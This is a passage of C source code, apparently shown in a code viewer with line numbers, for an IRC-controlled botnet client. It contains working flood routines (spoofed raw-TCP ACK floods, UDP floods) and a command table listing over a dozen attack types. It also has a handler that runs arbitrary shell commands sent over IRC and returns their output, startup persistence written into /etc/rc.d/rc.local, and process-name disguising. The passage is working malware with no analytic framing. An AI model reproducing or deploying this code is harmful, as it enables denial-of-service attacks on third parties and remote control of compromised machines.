| 1200 | sin.sin_family = AF_INET; | |
| 1201 | sin.sin_port = send_tcp.tcp.dest; | |
| 1202 | sin.sin_addr.s_addr = send_tcp.ip.daddr; | |
| 1203 | send_tcp.ip.check = in_cksum((unsigned short *)&send_tcp.ip, 20); | |
| 1204 | check = in_cksum((unsigned short *)&send_tcp, 40); | |
| 1205 | pseudo_header.source_address = send_tcp.ip.saddr; | |
| 1206 | pseudo_header.dest_address = send_tcp.ip.daddr; | |
| 1207 | pseudo_header.placeholder = 0; | |
| 1208 | pseudo_header.protocol = IPPROTO_TCP; | |
| 1209 | pseudo_header.tcp_length = htons(20+psize); | |
| 1210 | bcopy((char *)&send_tcp.tcp, (char *)&pseudo_header.tcp, 20); | |
| 1211 | bcopy((char *)&send_tcp.buf, (char *)&pseudo_header.buf, psize); | |
| 1212 | send_tcp.tcp.check = in_cksum((unsigned short *)&pseudo_header, 32+psize); | |
| 1213 | sendto(get, &send_tcp, 40+psize, 0, (struct sockaddr *)&sin, sizeof(sin)); | |
| 1214 | if (a >= 50) {
| |
| 1215 | if (time(NULL) >= start+secs) exit(0); | |
| 1216 | a=0; | |
| 1217 | } | |
| 1218 | a++; | |
| 1219 | } | |
| 1220 | close(get); | |
| 1221 | exit(0); | |
| 1222 | } | |
| 1223 | void nsack(int sock, char *sender, int argc, char **argv) {
| |
| 1224 | struct send_tcp send_tcp; | |
| 1225 | struct pseudo_header pseudo_header; | |
| 1226 | struct sockaddr_in sin; | |
| 1227 | unsigned int syn[20] = { 2,4,5,180,4,2,8,10,0,0,0,0,0,0,0,0,1,3,3,0 }, a=0;
| |
| 1228 | unsigned int psize=20, source, dest, check; | |
| 1229 | unsigned long saddr, daddr,secs; | |
| 1230 | int get; | |
| 1231 | time_t start=time(NULL); | |
| 1232 | if (mfork(sender) != 0) return; | |
| 1233 | if (argc < 3) {
| |
| 1234 | Send(sock,"NOTICE %s :NSACK <target> <port> <secs>\n",sender); | |
| 1235 | exit(1); | |
| 1236 | } | |
| 1237 | if ((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) exit(1); | |
| 1238 | {int i; for(i=0;i<20;i++) send_tcp.buf[i]=(u_char)syn[i];}
| |
| 1239 | daddr=host2ip(sender,argv[1]); | |
| 1240 | secs=atol(argv[3]); | |
| 1241 | dest=htons(atoi(argv[2])); | |
| 1242 | Send(sock,"NOTICE %s :Packeting %s\n",sender,argv[1]); | |
| 1243 | send_tcp.ip.ihl = 5; | |
| 1244 | send_tcp.ip.version = 4; | |
| 1245 | send_tcp.ip.tos = 16; | |
| 1246 | send_tcp.ip.frag_off = 64; | |
| 1247 | send_tcp.ip.ttl = 255; | |
| 1248 | send_tcp.ip.protocol = 6; | |
| 1249 | send_tcp.tcp.doff = 5; | |
| 1250 | send_tcp.tcp.res1 = 0; | |
| 1251 | send_tcp.tcp.cwr = 0; | |
| 1252 | send_tcp.tcp.ece = 0; | |
| 1253 | send_tcp.tcp.urg = 0; | |
| 1254 | send_tcp.tcp.ack = 1; | |
| 1255 | send_tcp.tcp.psh = 1; | |
| 1256 | send_tcp.tcp.rst = 0; | |
| 1257 | send_tcp.tcp.fin = 0; | |
| 1258 | send_tcp.tcp.syn = 0; | |
| 1259 | send_tcp.tcp.window = 30845; | |
| 1260 | send_tcp.tcp.urg_ptr = 0; | |
| 1261 | while(1) {
| |
| 1262 | saddr=INADDR_ANY; | |
| 1263 | if (atoi(argv[2]) == 0) dest=rand(); | |
| 1264 | send_tcp.ip.tot_len = htons(40+psize); | |
| 1265 | send_tcp.ip.id = rand(); | |
| 1266 | send_tcp.ip.check = 0; | |
| 1267 | send_tcp.ip.saddr = saddr; | |
| 1268 | send_tcp.ip.daddr = daddr; | |
| 1269 | send_tcp.tcp.source = rand(); | |
| 1270 | send_tcp.tcp.dest = dest; | |
| 1271 | send_tcp.tcp.seq = rand(); | |
| 1272 | send_tcp.tcp.ack_seq = rand(); | |
| 1273 | send_tcp.tcp.check = 0; | |
| 1274 | sin.sin_family = AF_INET; | |
| 1275 | sin.sin_port = send_tcp.tcp.dest; | |
| 1276 | sin.sin_addr.s_addr = send_tcp.ip.daddr; | |
| 1277 | send_tcp.ip.check = in_cksum((unsigned short *)&send_tcp.ip, 20); | |
| 1278 | check = in_cksum((unsigned short *)&send_tcp, 40); | |
| 1279 | pseudo_header.source_address = send_tcp.ip.saddr; | |
| 1280 | pseudo_header.dest_address = send_tcp.ip.daddr; | |
| 1281 | pseudo_header.placeholder = 0; | |
| 1282 | pseudo_header.protocol = IPPROTO_TCP; | |
| 1283 | pseudo_header.tcp_length = htons(20+psize); | |
| 1284 | bcopy((char *)&send_tcp.tcp, (char *)&pseudo_header.tcp, 20); | |
| 1285 | bcopy((char *)&send_tcp.buf, (char *)&pseudo_header.buf, psize); | |
| 1286 | send_tcp.tcp.check = in_cksum((unsigned short *)&pseudo_header, 32+psize); | |
| 1287 | sendto(get, &send_tcp, 40+psize, 0, (struct sockaddr *)&sin, sizeof(sin)); | |
| 1288 | if (a >= 50) {
| |
| 1289 | if (time(NULL) >= start+secs) exit(0); | |
| 1290 | a=0; | |
| 1291 | } | |
| 1292 | a++; | |
| 1293 | } | |
| 1294 | close(get); | |
| 1295 | exit(0); | |
| 1296 | } | |
| 1297 | void unknown(int sock, char *sender, int argc, char **argv) {
| |
| 1298 | int flag=1,fd,i; | |
| 1299 | unsigned long secs; | |
| 1300 | char *buf=(char*)malloc(9216); | |
| 1301 | struct hostent *hp; | |
| 1302 | struct sockaddr_in in; | |
| 1303 | time_t start=time(NULL); | |
| 1304 | if (mfork(sender) != 0) return; | |
| 1305 | if (argc < 2) {
| |
| 1306 | Send(sock,"NOTICE %s :UNKNOWN <target> <secs>\n",sender); | |
| 1307 | exit(1); | |
| 1308 | } | |
| 1309 | secs=atol(argv[2]); | |
| 1310 | memset((void*)&in,0,sizeof(struct sockaddr_in)); | |
| 1311 | in.sin_addr.s_addr=host2ip(sender,argv[1]); | |
| 1312 | in.sin_family = AF_INET; | |
| 1313 | Send(sock,"NOTICE %s :Unknowning %s.\n",sender,argv[1]); | |
| 1314 | while(1) {
| |
| 1315 | in.sin_port = rand(); | |
| 1316 | if ((fd = socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP)) < 0); | |
| 1317 | else {
| |
| 1318 | flag=1; | |
| 1319 | ioctl(fd,FIONBIO,&flag); | |
| 1320 | sendto(fd,buf,9216,0,(struct sockaddr*)&in,sizeof(in)); | |
| 1321 | close(fd); | |
| 1322 | } | |
| 1323 | if (i >= 50) {
| |
| 1324 | if (time(NULL) >= start+secs) break; | |
| 1325 | i=0; | |
| 1326 | } | |
| 1327 | i++; | |
| 1328 | } | |
| 1329 | close(fd); | |
| 1330 | exit(0); | |
| 1331 | } | |
| 1332 | void move(int sock, char *sender, int argc, char **argv) {
| |
| 1333 | if (argc < 1) {
| |
| 1334 | Send(sock,"NOTICE %s :MOVE <server>\n",sender); | |
| 1335 | exit(1); | |
| 1336 | } | |
| 1337 | server=strdup(argv[1]); | |
| 1338 | changeservers=1; | |
| 1339 | close(sock); | |
| 1340 | } | |
| 1341 | void killall(int sock, char *sender, int argc, char **argv) {
| |
| 1342 | unsigned long i; | |
| 1343 | for (i=0;i<numpids;i++) {
| |
| 1344 | if (pids[i] != 0 && pids[i] != getpid()) {
| |
| 1345 | if (sender) Send(sock,"NOTICE %s :Killing pid %d.\n",sender,pids[i]); | |
| 1346 | kill(pids[i],9); | |
| 1347 | } | |
| 1348 | } | |
| 1349 | } | |
| 1350 | void killd(int sock, char *sender, int argc, char **argv) {
| |
| 1351 | if (!disable) kill(0,9); | |
| 1352 | else Send(sock,"NOTICE %s :Unable to comply.\n"); | |
| 1353 | } | |
| 1354 | struct FMessages { char *cmd; void (* func)(int,char *,int,char **); } flooders[] = {
| |
| 1355 | { "UDP", udp },
| |
| 1356 | { "SYN", syn },
| |
| 1357 | { "NSSYN", nssyn },
| |
| 1358 | { "FIN", fin },
| |
| 1359 | { "PSH", psh },
| |
| 1360 | { "ACK", ack },
| |
| 1361 | { "NSACK", nsack },
| |
| 1362 | { "URG", urg },
| |
| 1363 | { "RST", rst },
| |
| 1364 | { "CWR", cwr },
| |
| 1365 | { "ECE", ece },
| |
| 1366 | { "SEW", sew },
| |
| 1367 | { "xmas", xmas },
| |
| 1368 | { "UNKNOWN", unknown },
| |
| 1369 | { "NICK", nickc },
| |
| 1370 | { "SERVER", move },
| |
| 1371 | { "GETSPOOFS", getspoofs },
| |
| 1372 | { "SPOOFS", spoof },
| |
| 1373 | { "DISABLE", disable },
| |
| 1374 | { "ENABLE", enable },
| |
| 1375 | { "KILL", killd },
| |
| 1376 | { "GET", get },
| |
| 1377 | { "VERSION", version },
| |
| 1378 | { "KILLALL", killall },
| |
| 1379 | { (char *)0, (void (*)(int,char *,int,char **))0 } };
| |
| 1380 | void _PRIVMSG(int sock, char *sender, char *str) {
| |
| 1381 | int i; | |
| 1382 | char *to, *message; | |
| 1383 | for (i=0;i<strlen(str) && str[i] != ' ';i++); | |
| 1384 | str[i]=0; | |
| 1385 | to=str; | |
| 1386 | message=str+i+2; | |
| 1387 | for (i=0;i<strlen(sender) && sender[i] != '!';i++); | |
| 1388 | sender[i]=0; | |
| 1389 | if (*message == '!' && !strcasecmp(to,chan)) {
| |
| 1390 | char *params[12], name[1024]={0};
| |
| 1391 | int num_params=0, m; | |
| 1392 | message++; | |
| 1393 | for (i=0;i<strlen(message) && message[i] != ' ';i++); | |
| 1394 | message[i]=0; | |
| 1395 | if (strwildmatch(message,nick)) return; | |
| 1396 | message+=i+1; | |
| 1397 | if (!strncmp(message,"IRC ",4)) if (disabled) Send(sock,"NOTICE %s :Unable to comply.\n",sender); else Send(sock,"%s\n",message+4); | |
| 1398 | if (!strncmp(message,"SH ",3)) {
| |
| 1399 | char buf[1024]; | |
| 1400 | FILE *command; | |
| 1401 | if (mfork(sender) != 0) return; | |
| 1402 | memset(buf,0,1024); | |
| 1403 | sprintf(buf,"export PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;%s",message+3); | |
| 1404 | command=popen(buf,"r"); | |
| 1405 | while(!feof(command)) {
| |
| 1406 | memset(buf,0,1024); | |
| 1407 | fgets(buf,1024,command); | |
| 1408 | Send(sock,"NOTICE %s :%s\n",sender,buf); | |
| 1409 | sleep(1); | |
| 1410 | } | |
| 1411 | pclose(command); | |
| 1412 | exit(0); | |
| 1413 | } | |
| 1414 | m=strlen(message); | |
| 1415 | for (i=0;i<m;i++) {
| |
| 1416 | if (*message == ' ' || *message == 0) break; | |
| 1417 | name[i]=*message; | |
| 1418 | message++; | |
| 1419 | } | |
| 1420 | for (i=0;i<strlen(message);i++) if (message[i] == ' ') num_params++; | |
| 1421 | num_params++; | |
| 1422 | if (num_params > 10) num_params=10; | |
| 1423 | params[0]=name; | |
| 1424 | params[num_params+1]="\0"; | |
| 1425 | m=1; | |
| 1426 | while (*message != 0) {
| |
| 1427 | message++; | |
| 1428 | if (m >= num_params) break; | |
| 1429 | for (i=0;i<strlen(message) && message[i] != ' ';i++); | |
| 1430 | params[m]=(char*)malloc(i+1); | |
| 1431 | strncpy(params[m],message,i); | |
| 1432 | params[m][i]=0; | |
| 1433 | m++; | |
| 1434 | message+=i; | |
| 1435 | } | |
| 1436 | for (m=0; flooders[m].cmd != (char *)0; m++) {
| |
| 1437 | if (!strcasecmp(flooders[m].cmd,name)) {
| |
| 1438 | flooders[m].func(sock,sender,num_params-1,params); | |
| 1439 | for (i=1;i<num_params;i++) free(params[i]); | |
| 1440 | return; | |
| 1441 | } | |
| 1442 | } | |
| 1443 | } | |
| 1444 | } | |
| 1445 | void _376(int sock, char *sender, char *str) {
| |
| 1446 | Send(sock,"MODE %s -x\n",nick); | |
| 1447 | Send(sock,"JOIN %s :%s\n",chan,key); | |
| 1448 | Send(sock,"WHO %s\n",nick); | |
| 1449 | } | |
| 1450 | void _PING(int sock, char *sender, char *str) {
| |
| 1451 | Send(sock,"PONG %s\n",str); | |
| 1452 | } | |
| 1453 | void _352(int sock, char *sender, char *str) {
| |
| 1454 | int i,d; | |
| 1455 | char *msg=str; | |
| 1456 | struct hostent *hostm; | |
| 1457 | unsigned long m; | |
| 1458 | for (i=0,d=0;d<5;d++) {
| |
| 1459 | for (;i<strlen(str) && *msg != ' ';msg++,i++); msg++; | |
| 1460 | if (i == strlen(str)) return; | |
| 1461 | } | |
| 1462 | for (i=0;i<strlen(msg) && msg[i] != ' ';i++); | |
| 1463 | msg[i]=0; | |
| 1464 | if (!strcasecmp(msg,nick) && !spoofsm) {
| |
| 1465 | msg=str; | |
| 1466 | for (i=0,d=0;d<3;d++) {
| |
| 1467 | for (;i<strlen(str) && *msg != ' ';msg++,i++); msg++; | |
| 1468 | if (i == strlen(str)) return; | |
| 1469 | } | |
| 1470 | for (i=0;i<strlen(msg) && msg[i] != ' ';i++); | |
| 1471 | msg[i]=0; | |
| 1472 | if ((m = inet_addr(msg)) == -1) {
| |
| 1473 | if ((hostm=gethostbyname(msg)) == NULL) {
| |
| 1474 | Send(sock,"NOTICE %s :I'm having a problem resolving my host, someone will have to SPOOFS me manually.\n",chan); | |
| 1475 | return; | |
| 1476 | } | |
| 1477 | memcpy((char*)&m, hostm->h_addr, hostm->h_length); | |
| 1478 | } | |
| 1479 | ((char*)&spoofs)[3]=((char*)&m)[0]; | |
| 1480 | ((char*)&spoofs)[2]=((char*)&m)[1]; | |
| 1481 | ((char*)&spoofs)[1]=((char*)&m)[2]; | |
| 1482 | ((char*)&spoofs)[0]=0; | |
| 1483 | spoofsm=256; | |
| 1484 | } | |
| 1485 | } | |
| 1486 | void _433(int sock, char *sender, char *str) {
| |
| 1487 | free(nick); | |
| 1488 | nick=makestring(); | |
| 1489 | } | |
| 1490 | void _NICK(int sock, char *sender, char *str) {
| |
| 1491 | int i; | |
| 1492 | for (i=0;i<strlen(sender) && sender[i] != '!';i++); | |
| 1493 | sender[i]=0; | |
| 1494 | if (!strcasecmp(sender,nick)) {
| |
| 1495 | if (*str == ':') str++; | |
| 1496 | if (nick) free(nick); | |
| 1497 | nick=strdup(str); | |
| 1498 | } | |
| 1499 | } | |
| 1500 | struct Messages { char *cmd; void (* func)(int,char *,char *); } msgs[] = {
| |
| 1501 | { "352", _352 },
| |
| 1502 | { "376", _376 },
| |
| 1503 | { "433", _433 },
| |
| 1504 | { "422", _376 },
| |
| 1505 | { "PRIVMSG", _PRIVMSG },
| |
| 1506 | { "PING", _PING },
| |
| 1507 | { "NICK", _NICK },
| |
| 1508 | { (char *)0, (void (*)(int,char *,char *))0 } };
| |
| 1509 | void con() {
| |
| 1510 | struct sockaddr_in srv; | |
| 1511 | unsigned long ipaddr,start; | |
| 1512 | int flag; | |
| 1513 | struct hostent *hp; | |
| 1514 | start: | |
| 1515 | sock=-1; | |
| 1516 | flag=1; | |
| 1517 | if (changeservers == 0) server=servers[rand()%numservers]; | |
| 1518 | changeservers=0; | |
| 1519 | while ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0); | |
| 1520 | if (inet_addr(server) == 0 || inet_addr(server) == -1) {
| |
| 1521 | if ((hp = gethostbyname(server)) == NULL) {
| |
| 1522 | server=NULL; | |
| 1523 | close(sock); | |
| 1524 | goto start; | |
| 1525 | } | |
| 1526 | bcopy((char*)hp->h_addr, (char*)&srv.sin_addr, hp->h_length); | |
| 1527 | } | |
| 1528 | else srv.sin_addr.s_addr=inet_addr(server); | |
| 1529 | srv.sin_family = AF_INET; | |
| 1530 | srv.sin_port = htons(6667); | |
| 1531 | ioctl(sock,FIONBIO,&flag); | |
| 1532 | start=time(NULL); | |
| 1533 | while(time(NULL)-start < 10) {
| |
| 1534 | errno=0; | |
| 1535 | if (connect(sock, (struct sockaddr *)&srv, sizeof(srv)) == 0 || errno == EISCONN) {
| |
| 1536 | setsockopt(sock,SOL_SOCKET,SO_LINGER,0,0); | |
| 1537 | setsockopt(sock,SOL_SOCKET,SO_REUSEADDR,0,0); | |
| 1538 | setsockopt(sock,SOL_SOCKET,SO_KEEPALIVE,0,0); | |
| 1539 | return; | |
| 1540 | } | |
| 1541 | if (!(errno == EINPROGRESS ||errno == EALREADY)) break; | |
| 1542 | sleep(1); | |
| 1543 | } | |
| 1544 | server=NULL; | |
| 1545 | close(sock); | |
| 1546 | goto start; | |
| 1547 | } | |
| 1548 | int main(int argc, char **argv) {
| |
| 1549 | int on,i; | |
| 1550 | char cwd[256],*str; | |
| 1551 | FILE *file; | |
| 1552 | #ifdef STARTUP | |
| 1553 | str="/etc/rc.d/rc.local"; | |
| 1554 | file=fopen(str,"r"); | |
| 1555 | if (file == NULL) {
| |
| 1556 | str="/etc/rc.conf"; | |
| 1557 | file=fopen(str,"r"); | |
| 1558 | } | |
| 1559 | if (file != NULL) {
| |
| 1560 | char outfile[256], buf[1024]; | |
| 1561 | int i=strlen(argv[0]), d=0; | |
| 1562 | getcwd(cwd,256); | |
| 1563 | if (strcmp(cwd,"/")) {
| |
| 1564 | while(argv[0][i] != '/') i--; | |
| 1565 | sprintf(outfile,"\"%s%s\"\n",cwd,argv[0]+i); | |
| 1566 | while(!feof(file)) {
| |
| 1567 | fgets(buf,1024,file); | |
| 1568 | if (!strcasecmp(buf,outfile)) d++; | |
| 1569 | } | |
| 1570 | if (d == 0) {
| |
| 1571 | FILE *out; | |
| 1572 | fclose(file); | |
| 1573 | out=fopen(str,"a"); | |
| 1574 | if (out != NULL) {
| |
| 1575 | fputs(outfile,out); | |
| 1576 | fclose(out); | |
| 1577 | } | |
| 1578 | } | |
| 1579 | else fclose(file); | |
| 1580 | } | |
| 1581 | else fclose(file); | |
| 1582 | } | |
| 1583 | #endif | |
| 1584 | if (fork()) exit(0); | |
| 1585 | #ifdef FAKENAME | |
| 1586 | strncpy(argv[0],FAKENAME,strlen(argv[0])); | |
| 1587 | for (on=1;on<argc;on++) memset(argv[on],0,strlen(argv[on])); | |
| 1588 | #endif | |
| 1589 | srand((time(NULL) ^ getpid()) + getppid()); | |
| 1590 | nick=makestring(); | |
| 1591 | ident=makestring(); | |
| 1592 | user=makestring(); | |
| 1593 | chan=CHAN; | |
| 1594 | key=KEY; | |
| 1595 | server=NULL; | |
| 1596 | sa: | |
| 1597 | #ifdef IDENT | |
| 1598 | for (i=0;i<numpids;i++) {
| |
| 1599 | if (pids[i] != 0 && pids[i] != getpid()) {
| |
| 1600 | kill(pids[i],9); | |
| 1601 | waitpid(pids[i],NULL,WNOHANG); | |
| 1602 | } | |
| 1603 | } | |
| 1604 | pids=NULL; | |
| 1605 | numpids=0; | |
| 1606 | identd(); | |
| 1607 | #endif | |
| 1608 | con(); | |
| 1609 | Send(sock,"NICK %s\nUSER %s localhost localhost :%s\n",nick,ident,user); | |
| 1610 | while(1) {
| |
| 1611 | unsigned long i; | |
| 1612 | fd_set n; | |
| 1613 | struct timeval tv; | |
| 1614 | FD_ZERO(&n); | |
| 1615 | FD_SET(sock,&n); | |
| 1616 | tv.tv_sec=60*20; | |
| 1617 | tv.tv_usec=0; | |
| 1618 | if (select(sock+1,&n,(fd_set*)0,(fd_set*)0,&tv) <= 0) goto sa; | |
| 1619 | for (i=0;i<numpids;i++) if (waitpid(pids[i],NULL,WNOHANG) > 0) {
| |
| 1620 | unsigned int *newpids,on; | |
| 1621 | for (on=i+1;on<numpids;on++) pids[on-1]=pids[on]; | |
| 1622 | pids[on-1]=0; | |
| 1623 | numpids--; | |
| 1624 | newpids=(unsigned int*)malloc((numpids+1)*sizeof(unsigned int)); | |
| 1625 | for (on=0;on<numpids;on++) newpids[on]=pids[on]; | |
| 1626 | free(pids); | |
| 1627 | pids=newpids; | |
| 1628 | } | |
| 1629 | if (FD_ISSET(sock,&n)) {
| |
| 1630 | char buf[4096], *str; | |
| 1631 | int i; | |
| 1632 | if ((i=recv(sock,buf,4096,0)) <= 0) goto sa; | |
| 1633 | buf[i]=0; | |
| 1634 | str=strtok(buf,"\n"); | |
| 1635 | while(str && *str) {
| |
| 1636 | char name[1024], sender[1024]; | |
| 1637 | filter(str); | |
| 1638 | if (*str == ':') {
| |
| 1639 | for (i=0;i<strlen(str) && str[i] != ' ';i++); | |
| 1640 | str[i]=0; | |
| 1641 | strcpy(sender,str+1); | |
| 1642 | strcpy(str,str+i+1); | |
| 1643 | } | |
| 1644 | else strcpy(sender,"*"); | |
| 1645 | for (i=0;i<strlen(str) && str[i] != ' ';i++); | |
| 1646 | str[i]=0; | |
| 1647 | strcpy(name,str); | |
| 1648 | strcpy(str,str+i+1); | |
| 1649 | for (i=0;msgs[i].cmd != (char *)0;i++) if (!strcasecmp(msgs[i].cmd,name)) msgs[i].func(sock,sender,str); | |
| 1650 | if (!strcasecmp(name,"ERROR")) goto sa; | |
| 1651 | str=strtok((char*)NULL,"\n"); | |
| 1652 | } | |
| 1653 | } | |
| 1654 | } | |
| 1655 | return 0; | |
| 1656 | } |